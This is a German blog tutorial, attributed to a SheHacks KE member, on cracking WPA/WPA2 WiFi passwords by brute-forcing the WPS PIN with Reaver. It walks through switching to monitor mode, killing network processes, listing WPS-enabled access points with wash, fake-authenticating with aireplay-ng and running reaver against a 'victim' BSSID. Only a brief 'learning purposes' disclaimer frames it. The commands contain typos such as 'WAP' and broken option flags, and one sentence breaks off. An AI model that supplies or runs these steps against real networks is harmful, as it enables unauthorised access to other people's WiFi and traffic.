WPA/WPA2 WiFi mit Reaver hacken

Wir alle wissen, dass die meisten Leute es vorziehen, ein WiFi-Passwort für ihre drahtlose Verbindung festzulegen. Das kann so einfach sein wie 12345 oder so komplex wie eine Kombination aus mehreren Buchstaben, Zahlen und Zeichen. Die schlechte Nachricht ist, dass es ein Tool namens Reaver gibt, mit dem Sie Ihr WAP/WAP2-WiFi-Passwort knacken können.

Über WEP, WAP und WAP2

Um die Funktionen von WEP (Wired Equivalent Privacy) zu verbessern, wurde 2003 WiFi Protected Access oder WPA entwickelt. Diese vorübergehende Verbesserung bietet immer noch relativ wenig Sicherheit, ist aber einfacher zu konfigurieren. WPA verwendet das Temporal Key Integrity Protocol (TKIP) für eine sicherere Verschlüsselung als WEP.

Ein Jahr später, im Jahr 2004, wurde WiFi Protected Access 2 verfügbar. WPA2 bietet eine höhere Sicherheit und ist einfacher zu konfigurieren als die vorherigen Optionen. Der Hauptunterschied bei WPA2 besteht darin, dass es den Advanced Encryption Standard (AES) anstelle von TKIP verwendet.

Was Sie brauchen.

  • Einen WiFi-Adapter, der den Monitormodus unterstützt
  • Einen Computer mit WiFi
  • Ein WPA-gesichertes WiFi-Netzwerk in der Nähe
  • Reaver installiert
  • Persistenz

Ich gehe davon aus, dass Ihr Router so konfiguriert ist, dass er keine Push Button Authentication verwendet.(PBC)

Lassen Sie uns Folgendes tun

Wenn Sie eine virtuelle Maschine verwenden, müssen Sie zuerst Ihren USB-Controller aktivieren, indem Sie zu den Einstellungen gehen, dann auf USB klicken und Ihr USB-Gerät auswählen.

NB: Stellen Sie sicher, dass der von Ihnen verwendete Wireless-Adapter den Monitormodus unterstützt.

Danach führen Sie den folgenden Befehl aus:

iwconfig

Dieser Befehl zeigt Ihnen nur drahtlose Schnittstellen

Ausführen:

sudo ifconfig wlan0 down

Dies deaktiviert WiFi

Dann:

sudo airmon-ng check kill

Dieser Befehl beendet jeden Prozess, der die Verwendung meiner Schnittstelle im Monitormodus stören könnte. Er beendet den Netzwerkmanager, so dass es kein Internet gibt.

Dann ausführen:

iwconfig wlan0 mode monitor

Dieser Befehl ändert den Modus vom verwalteten Modus in den Monitormodus.

Der verwaltete Modus ist der Standardmodus für alle drahtlosen Geräte.

Der Grund, warum wir den Modus von verwaltet auf überwacht ändern müssen, ist, dass wir nicht nur die Pakete erfassen wollen, die die Mac-Adresse unseres Geräts haben, sondern alle Pakete, auch die, die an den Router und andere Geräte gesendet werden. Dies ist nur möglich, wenn sich der WiFi-Adapter im Überwachungsmodus befindet.

Dann führen Sie aus:

sudo ifconfig wlan0 up

Damit wird das WiFi wieder aktiviert.

Dann führen Sie aus:

iwconfig

Damit wird überprüft, ob der Modus von verwaltet auf überwacht geändert wurde. Wenn ja, sollte dies im Terminal angezeigt werden.

Die Abbildung unten zeigt, dass der Modus auf Monitor geändert wurde.

wash - interface wlan0

Dies zeigt alle WPS-aktivierten Aps, die die drahtlose Schnittstelle verwenden.

Aireplay-ng - fakeauth 30 -a<bssid> -h <macid> wlan0

Für die Mac-ID öffnen Sie einen neuen Tab und geben ifconfig ein. Kopieren Sie die ersten 12 Ziffern von unspec in wlan0.

DON’T HIT ENTER YET.

Öffnen Sie einen weiteren neuen Tab.

Stellen Sie sicher, dass Sie Reaver installiert haben. Wenn nicht, führen Sie den folgenden Befehl aus.

Sudo apt-get install aircrack-ng reaver

So wird Reaver installiert.

Reaver erzwingt den Pin und verknüpft ihn mit dem Ziel. Sobald er den Pin hat, verwendet er ihn, um den tatsächlichen WAP/WAP2-Schlüssel zu berechnen.

Dann führen Sie den folgenden Befehl aus:

Reaver - bssid<victim bssid> - channel <the channel of the victim> - interface wlan0 –vvv - no-associate

Drücken Sie auf dieser Registerkarte die Eingabetaste und drücken Sie auch auf der anderen Registerkarte die Eingabetaste, die Sie nicht drücken sollten.

Das sollte ein paar Minuten dauern, da alle möglichen Kombinationen durchprobiert werden, und am Ende werden Sie den WPS-Pin, das WAP-Passwort und den Namen des Wi-Fi

DISCLAIMER. Dieser Artikel dient nur zu Lernzwecken, wir übernehmen keine Verantwortung für Schäden, die durch die Verwendung dieses Artikels entstehen.

Artikel von Restercuter Nyawira, einem SheHacks KE-Mitglied, Ausbilderin und Cybersicherheits-Enthusiastin. Sie finden sie auf LinkedIn (Restercuter Nyawira) und Twitter @Restercuter1.

Schreibe einen Kommentar

Deine E-Mail-Adresse wird nicht veröffentlicht.